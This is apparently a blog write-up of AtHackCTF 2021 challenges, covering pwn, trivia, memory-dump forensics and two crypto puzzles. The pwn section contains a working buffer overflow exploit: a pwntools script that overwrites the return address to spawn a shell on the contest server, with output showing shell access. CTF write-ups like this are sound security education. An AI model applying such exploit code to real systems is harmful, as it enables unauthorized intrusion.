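This contest was held from 2021/11/20 21:00 (JST) to 2021/11/21 5:00 (JST).
I took part with my team again this time. We scored 408 points and placed 44th out of 338 teams.
Here are write-ups for the challenges I solved myself.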
PWN 1 (PWN 100)
Decompile main with Ghidra.
```c
undefined8 main(void)
{
  setvbuf(stderr,(char *)0x0,2,0);
  setvbuf(stdout,(char *)0x0,2,0);
  vuln();
  return 0;
}

void vuln(void)
{
  char local_12 [10];

  fgets(local_12,0xaa,stdin);
  return;
}

void mysterious_function(void)
{
  system("/bin/sh");
  return;
}
```
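vuln passes a size of 0xaa to fgets for the 10-byte buffer local_12, so the BOF can be used to overwrite the return address and call mysterious_function.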
```
$ gdb -q ./main
Reading symbols from ./main...(no debugging symbols found)...done.
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/main
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers----------------------------------]
RAX: 0x7fffffffde46 ("AAA%AAsAABAA$AA"...)
RBX: 0x0
RCX: 0x1f
RDX: 0x7ffff7dcf8d0 --> 0x0
RSI: 0x7fffffffde46 ("AAA%AAsAABAA$AA"...)
RDI: 0x7fffffffde47 ("AA%AAsAABAA$AAn"...)
RBP: 0x41416e4141244141 (b'AA$AAnAA')
RSP: 0x7fffffffde58 ("CAA-AA(AADAA;AA"...)
RIP: 0x40066c (<vuln+34>: ret)
R8 : 0x6022c5 --> 0x0
R9 : 0x7ffff7fda4c0 (0x00007ffff7fda4c0)
R10: 0x602010 --> 0x0
R11: 0x246
R12: 0x400550 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdf40 --> 0x1
R14: 0x0
R15: 0x0
[------------------------------------code-------------------------------------]
Display various information of current execution context
Usage:
    context [reg,code,stack,all] [code/stack length]

0x000000000040066c in vuln ()
gdb-peda$ patto CAA-AA(AADAA;AA
CAA-AA(AADAA;AA found at offset: 18

$ ROPgadget --binary ./main | grep ": ret"
0x000000000040050e : ret
```
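```python
# Python 2 script (print statements) using pwntools.
import sys
from pwn import *

# No argument: connect to the contest server; any argument: run the local binary.
if len(sys.argv) == 1:
    p = remote('1-pwn.athack-ctf.com', 1337)
else:
    p = process('./main')

elf = ELF('./main')
mysterious_function_addr = elf.symbols['mysterious_function']
ret_addr = 0x40050e   # ": ret" gadget reported by ROPgadget
offset = 18           # offset to the return address reported by patto

print hex(mysterious_function_addr)

# padding up to the return address, then the ret gadget, then the target function
payload = 'A' * offset
payload += p64(ret_addr)
payload += p64(mysterious_function_addr)
print payload
p.sendline(payload)
p.interactive()
```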
The result of running it is shown below.
```
[+] Opening connection to 1-pwn.athack-ctf.com on port 1337: Done
[*] '/mnt/hgfs/Shared/main'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
0x400637
AAAAAAAAAAAAAAAAAA\x0e@\x00\x00\x00\x06\x00\x00\x00
[*] Switching to interactive mode
$ ls
flag.txt
main
ynetd
$ cat flag.txt
AtHackCTF{9302575208025782507402580}
```
AtHackCTF{9302575208025782507402580}
X BoF (Trivia 100)
A program failed when Unicode characters were inserted into input that was expected to be ASCII. The question asks which type of BoF is suspected in this case.
AtHackCTF{Unicode BoF}
Debug (DFIR 100)
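A memory dump file is attached, and the flag format is given as "Flag Format: AtHackCTF{md5(FAILUREIDHASH_BUGCHECKCODE_FAILUREBUCKETID)}".
Open it in WinDbg and click !analyze -v. The three values needed for the flag are marked with ★ in the output.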
```
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 80000003, Exception code that caused the bugcheck
Arg2: 05080cb3, Address of the instruction which caused the bugcheck
Arg3: 0632ed50, Address of the context record for the exception that caused the bugcheck
Arg4: 00000000, zero.

Debugging Details:
------------------

Unable to load image \??\C:\Windows\system32\drivers\myfault.sys, Win32 error 0n2

KEY_VALUES_STRING: 1

    Key  : Analysis.CPU.mSec
    Value: 765

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 1762

    Key  : Analysis.Init.CPU.mSec
    Value: 2749

    Key  : Analysis.Init.Elapsed.mSec
    Value: 35838

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 100

    Key  : WER.OS.Branch
    Value: win7sp1_rtm

    Key  : WER.OS.Timestamp
    Value: 2010-11-19T18:50:00Z

    Key  : WER.OS.Version
    Value: 7.1.7601.17514

VIRTUAL_MACHINE:  VMware

BUGCHECK_CODE:  3b★

BUGCHECK_P1: 80000003

BUGCHECK_P2: fffff88005080cb3

BUGCHECK_P3: fffff8800632ed50

BUGCHECK_P4: 0

CONTEXT:  0632ed50 -- (.cxr 0xfffff8800632ed50)
eax=02ffba30 ebx=fffff880 ecx=fffffa80 edx=02ffba00 esi=0632fb60 edi=fffff880
eip=00000000 esp=00000000 ebp=fffffa80 iopl=0 nv up di pl nz na po nc
cs=0000 ss=0018 ds=f730 es=0000 fs=0000 gs=f880 efl=00000000
00000000`00000000 ?? ???
Resetting default scope

PROCESS_NAME:  notmyfault64.exe

IP_IN_FREE_BLOCK: 0

BAD_STACK_POINTER:  00000000

STACK_TEXT:
00000000 00000000 00000000 00000000 00000000 0x0

SYMBOL_NAME:  myfault+1cb3

MODULE_NAME: myfault

IMAGE_NAME:  myfault.sys

STACK_COMMAND:  .thread ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_KERNEL_CONTEXT_0x3B_80000003★

OS_VERSION:  7.1.7601.17514

BUILDLAB_STR:  win7sp1_rtm

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 7

FAILURE_ID_HASH:  {e531da8c-62d2-198a-1c77-b5a06a202afd}★

Followup:     MachineOwner
---------
```
```
$ echo -n "e531da8c-62d2-198a-1c77-b5a06a202afd_3b_INVALID_KERNEL_CONTEXT_0x3B_80000003" | md5sum
db5f4defc49e3a126bbe7d9a7ca548fa  -
```
AtHackCTF{db5f4defc49e3a126bbe7d9a7ca548fa}
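The manual copy-and-hash step above can be scripted when many dumps have to be triaged. The following is an added example, not part of the original write-up: it parses the `NAME: value` fields of saved `!analyze -v` text and builds the same FAILUREIDHASH_BUGCHECKCODE_FAILUREBUCKETID string. The names `SAMPLE_ANALYSIS`, `parse_analysis` and `crash_fingerprint` are introduced here, and the sample text is a constructed excerpt of the output shown above.

```python
import hashlib
import re

# Constructed excerpt: a few lines of the !analyze -v output shown on this page.
SAMPLE_ANALYSIS = """\
SYSTEM_SERVICE_EXCEPTION (3b)
BUGCHECK_CODE:  3b
BUGCHECK_P1: 80000003
PROCESS_NAME:  notmyfault64.exe
FAILURE_BUCKET_ID:  INVALID_KERNEL_CONTEXT_0x3B_80000003
FAILURE_ID_HASH:  {e531da8c-62d2-198a-1c77-b5a06a202afd}
"""

# An upper-case field name at the start of a line, a colon, then a value on the same line.
FIELD_RE = re.compile(r"^([A-Z][A-Z0-9_]*):[ \t]*(\S.*?)[ \t]*$", re.MULTILINE)


def parse_analysis(text):
    """Return the 'NAME: value' fields of an !analyze -v report as a dict."""
    fields = {}
    for name, value in FIELD_RE.findall(text):
        fields.setdefault(name, value)  # keep the first occurrence of each field
    return fields


def crash_fingerprint(text):
    """Return (FAILUREIDHASH_BUGCHECKCODE_FAILUREBUCKETID, its MD5 hex digest)."""
    fields = parse_analysis(text)
    required = ("FAILURE_ID_HASH", "BUGCHECK_CODE", "FAILURE_BUCKET_ID")
    missing = [name for name in required if name not in fields]
    if missing:
        raise ValueError("missing fields: " + ", ".join(missing))
    # WinDbg prints the failure ID hash as a GUID in braces; the flag uses it bare.
    failure_id = fields["FAILURE_ID_HASH"].strip("{}")
    joined = "_".join([failure_id, fields["BUGCHECK_CODE"],
                       fields["FAILURE_BUCKET_ID"]])
    return joined, hashlib.md5(joined.encode("ascii")).hexdigest()


if __name__ == "__main__":
    joined, digest = crash_fingerprint(SAMPLE_ANALYSIS)
    print(joined)
    print(digest)
```

On the constructed sample, the joined string is the same one passed to md5sum in the write-up.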
Fun Math (Crypto 100)
Each character is encrypted individually, so decrypt by brute force.
```python
#!/usr/bin/env python3
def my_function(x):
    return pow(x,3)+10*pow(x,2)+x*7 + 6

cipher = [317336, 1696274, 425598, 1007448, 1069008, 1340288, 346128, 663858,
    392496, 2013024, 734808, 1233758, 1268616, 1069008, 1233758, 948296,
    142008, 1653936, 948296, 516368, 133974, 1612308, 1133024, 948296, 392496,
    1739328, 1452776, 948296, 641264, 133974, 497274, 1783104, 1268616,
    1452776, 1199544, 948296, 1531158, 133974, 1377114, 1918824, 1452776,
    133974, 1414608, 1268616, 1007448, 1377114, 1653936, 948296, 556008,
    619188, 948296, 1037924, 619188, 1739328, 1696274, 1133024, 392496,
    133974, 1612308, 1069008, 1268616, 1452776, 1199544, 290184, 47064,
    2110256]

flag = ''
for c in cipher:
    # try every printable ASCII code until my_function reproduces the ciphertext value
    for code in range(32, 127):
        if my_function(code) == c:
            flag += chr(code)
            break
print(flag)
```
AtHackCTF{Which_1s_M0re_Fun_S0Lving_p0lyn0mials_OR_bRuteF0rcing?!}
Complex (Crypto)
Compute a and b using the formula for the square root of a complex number. Then compute x with inverse and assemble the flag.
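The formula referred to here, written out as an added derivation that is not part of the original write-up. It assumes, as the solve script implies, that $c$ and $d$ are the real and imaginary parts of $(a+bi)^2$ for positive integers $a$ and $b$, and that each entry of parts is $x \cdot a$ (even index) or $x \cdot b$ (odd index) modulo $p$.

$$
\begin{aligned}
(a+bi)^2 &= (a^2-b^2) + 2ab\,i = c + di
  &&\Rightarrow\quad c = a^2-b^2,\quad d = 2ab \\
K &= \sqrt{c^2+d^2} = \lvert a+bi \rvert^2 = a^2+b^2 \\
a^2 &= \frac{K+c}{2}, \qquad b^2 = \frac{K-c}{2} \\
x_i &\equiv \mathrm{parts}_i \cdot a^{-1} \pmod{p}\ \ (i \text{ even}), \qquad
x_i \equiv \mathrm{parts}_i \cdot b^{-1} \pmod{p}\ \ (i \text{ odd})
\end{aligned}
$$

The three assert statements in the script check that $K$, $a$ and $b$ obtained this way are exact integer square roots.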
```python
#!/usr/bin/env python3
import gmpy2
from Crypto.Util.number import *

c = 6983291701597905
d = 5336385994037448
parts = [380932079629368, 191767163205492, 391844072538906, 242715789325632,
    636916609920084, 101350594515744, 701115392013585, 136776893476692,
    666218469621657, 205565478406008, 588555394058607, 3755755500]
p = 14088005995134184327

# K = sqrt(c^2 + d^2), checked to be an exact integer root
K2 = c ** 2 + d ** 2
K = gmpy2.iroot(K2, 2)[0]
assert K**2 == K2

# a^2 = (c + K) / 2
a2 = (c + K) // 2
a = gmpy2.iroot(a2, 2)[0]
assert a**2 == a2

# b^2 = (-c + K) / 2
b2 = (- c + K) // 2
b = gmpy2.iroot(b2, 2)[0]
assert b**2 == b2

# even-indexed parts are divided by a, odd-indexed parts by b (mod p)
flag = b''
for i in range(len(parts)):
    if i % 2 == 0:
        x = (parts[i] * inverse(a, p)) % p
    else:
        x = (parts[i] * inverse(b, p)) % p
    flag += long_to_bytes(x)

flag = flag.decode()
print(flag)
```
AtHackCTF{C0mpl3xxxx_Ev3ryWheRe!!}